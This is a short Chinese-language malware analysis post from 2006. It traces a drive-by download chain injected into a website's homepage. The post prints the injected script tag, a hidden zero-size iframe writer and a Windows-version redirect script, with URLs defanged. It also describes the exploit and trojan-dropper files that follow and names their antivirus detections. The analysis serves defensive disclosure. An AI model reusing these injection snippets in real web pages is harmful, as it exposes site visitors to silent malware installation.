endurer 原創
2006-04-24 第1版
在hxxp://www.hj234.com的首頁有代碼:
<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>
hxxp://www.***hj234.com/abc/abc.js的內容為:
document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")
hxxp://www.***hj234.com/abc/joke.htm的內容為:
<center><font color=red>對不起,您訪問的頁面不存在!</font><center> <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>
會根據瀏覽者所用Windows版本,開啟windows.htm,winnt.htm或w98.htm
從這個網頁開始,所用的技術與發現一個使用技術升級、下載灰鴿子的網站相同。
這3個網頁會下載/運行檔案young.gif和young.css
young.gif 是個利用系統漏洞的網頁檔案,訪問註冊表擷取IE臨時檔案夾路徑,並利用WScript.Shell複製檔案young.css,建立檔案c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006報為Exploit.VBS.Phel.ba
young.css 用VB6編寫,修改IE啟動頁,建立名為services.exe的檔案,並在註冊表的run鍵加入開機啟動項,江民KV2006報為TrojanDropper.Delf.d